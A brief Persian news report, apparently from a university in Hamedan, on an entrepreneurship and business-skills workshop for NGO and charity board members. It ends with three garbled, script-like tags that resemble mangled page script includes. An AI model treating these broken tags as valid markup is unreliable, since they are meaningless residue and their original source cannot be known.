برگزاری کارگاه آموزشی روش های کارآفرینی و مهارت خلق کسب و کار و درآمدزایی

کارگاه آموزشی روش های کارآفرینی و مهارت خلق کسب و کار و درآمدزایی ویژه سازمان های مردم نهاد و موسسات خیریه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، کارگاه آموزشی روش های کارآفرینی و مهارت خلق کسب و کار و درآمدزایی ویژه سازمان های مردم نهاد و موسسات خیریه با حضور مدیر عاملان و اعضاء  هیات مدیره سمن های همدان برگزار شد.

دراین کارگاه مباحث مربوط به خلاقیت و ویژگیهای افراد خلاق و توانایی حل مسأله توسط دکتر رستگار کینجاه و دکتر جباری بیاناتی تدریس شد.

مدیریت مشارکت های مردمی دانشگاه در راستای مهارت آموزی و ارتقاء دانش سازمان های مردم نهاد با همکاری استانداری، سازمان ورزش و جوانان اقدام به برگزاری دوره هایی در طول سال خواهد کرد که اثرات آن در مدیریت برنامه ریزی سازمان ها و موسسات اثرگذار خواهد بود.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>